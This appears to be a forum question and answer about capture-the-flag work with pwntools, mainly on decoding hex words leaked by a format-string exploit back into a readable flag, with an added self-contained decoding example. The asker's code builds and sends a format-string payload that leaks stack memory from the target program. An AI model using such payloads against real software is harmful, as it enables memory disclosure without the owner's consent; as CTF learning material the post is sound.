I've been learning the pwntools python library and using it to build solutions to CTF challenges. One thing I keep running into is that, after a successful exploit (say of a format string vulnerability) where I get the program to leak the memory I want, it's a pain to format the output in such a way as to easily read the flag.
This feels like something that there is a one-liner inside of pwntools to address, but I have not been able to find it.
My current solution (which works) seems like it's harder than it needs to be, so I'm hoping I'm just blind and missing the one-liner I suspect is there.
Here is what I'm doing now:
from pwn import *

# r is the pwntools tube (process/remote) already opened earlier
payload = ""
for n in range(32, 32+16):
    payload += "%" + str(n) + "$x."
r.send(payload)
r.send("\n")
# disregard one line
r.recvline()
# this is where I get my memory leak, in the form of hex numbers separated by '.'
data = r.recvline()
dataBytes = data.split(b'.')
answer = b''
for db in dataBytes:
    # pad the bytes to full width
    while len(db) < 8:
        db = b'0' + db
    # byteorder is required before Python 3.11
    i = int.from_bytes(unhex(db), 'big')
    answer += pack(i, endian="little")
print(answer)
You actually don't need to pad the hex to 8 characters first. int(x, 16) will handle short hex just fine.
For example, if you know you're leaking 64-bit values:
data = r.recvline().strip().split(b'.')
# 'if x' skips the empty field that a trailing '.' leaves behind (int(b'', 16) raises)
answer = b''.join(p64(int(x, 16)) for x in data if x)
print(answer)
If you're on a 32-bit challenge, just swap in p32.
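A fuller version of the same decoding step, as an added example that is not code from the question or the answer: it uses struct.pack in place of pwntools' p32/p64 (same output) so it runs without pwntools installed, skips the empty field that the trailing '.' produces, works for both word sizes, and pulls the printable run (the flag) out of the decoded bytes. The leak lines below are constructed samples, not real program output.

```python
import re
import struct

# Constructed sample of what recvline() returns for a "%n$x." style leak.
# Note the short field "7d73" (no zero-padding needed) and the trailing '.'.
SAMPLE_LINE_32 = b"67616c66.6e77707b.6c6f6f74.7d73.41414141.\n"
# Same string leaked as 64-bit words ("%n$lx." style).
SAMPLE_LINE_64 = b"6e77707b67616c66.7d736c6f6f74.\n"


def leak_to_bytes(line, word_size=32):
    """Turn a '.'-separated line of hex words back into the bytes they were read from.

    word_size selects little-endian 32- or 64-bit packing, i.e. the same
    transformation pwntools' p32()/p64() perform.
    """
    fmt = {32: "<I", 64: "<Q"}[word_size]
    out = b""
    for field in line.strip().split(b"."):
        if not field:  # empty field from the trailing '.'; int(b'', 16) would raise
            continue
        value = int(field, 16)  # handles unpadded hex such as b"7d73"
        if value >> word_size:
            raise ValueError("field %r wider than %d bits; wrong word_size?" % (field, word_size))
        out += struct.pack(fmt, value)
    return out


def printable_runs(blob, min_len=4):
    """Return the runs of printable ASCII (at least min_len long) found in blob."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_flag(blob, prefix=b"flag{"):
    """Return the first printable run that starts with prefix and ends in '}', or None."""
    for run in printable_runs(blob):
        if run.startswith(prefix) and b"}" in run:
            return run[: run.index(b"}") + 1]
    return None


if __name__ == "__main__":
    decoded = leak_to_bytes(SAMPLE_LINE_32)
    print(decoded)            # b'flag{pwntools}\x00\x00AAAA'
    print(find_flag(decoded))  # b'flag{pwntools}'
    print(find_flag(leak_to_bytes(SAMPLE_LINE_64, word_size=64)))
```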